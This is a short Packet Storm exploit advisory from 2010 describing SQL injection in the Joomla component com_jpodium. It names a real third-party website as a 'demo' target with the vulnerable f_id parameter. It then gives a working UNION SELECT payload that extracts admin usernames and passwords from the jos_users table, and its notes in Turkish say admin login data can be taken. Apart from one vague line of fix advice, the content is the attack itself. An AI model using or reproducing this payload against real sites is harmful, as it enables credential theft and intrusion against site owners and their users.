Joomla JPodium SQL Injection

2010-08-12T00:00:00
ID PACKETSTORM:92613
Type packetstorm
Reporter Fl0riX
Modified 2010-08-12T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
#############################################################  
Joomla Component jpodium SQL Injection Vulnerability   
#############################################################  
  
# Author : Fl0riX ~ Bug Researchers  
  
# Greez: KEDESIGN , Sakkure , All CW And All My Friends.  
  
# Name : Joomla com_jpodium  
  
# Bug Type : SQL injection  
  
# Infection : Admin Login Bilgileri Alinabilir.  
  
# Demo Vuln :  
http://www.adelaarcyclingteam.nl/ploeg/index.php?option=com_jpodium&view=portraits&layout=detail&f_id=[EXPLOIT]  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
EXPLOIT :  
null+and+1=0+union+select+1,concat(username,0x3a,password)fl0rix,3+from+jos_users--  
  
< -- bug code end of -- >  
  
  
`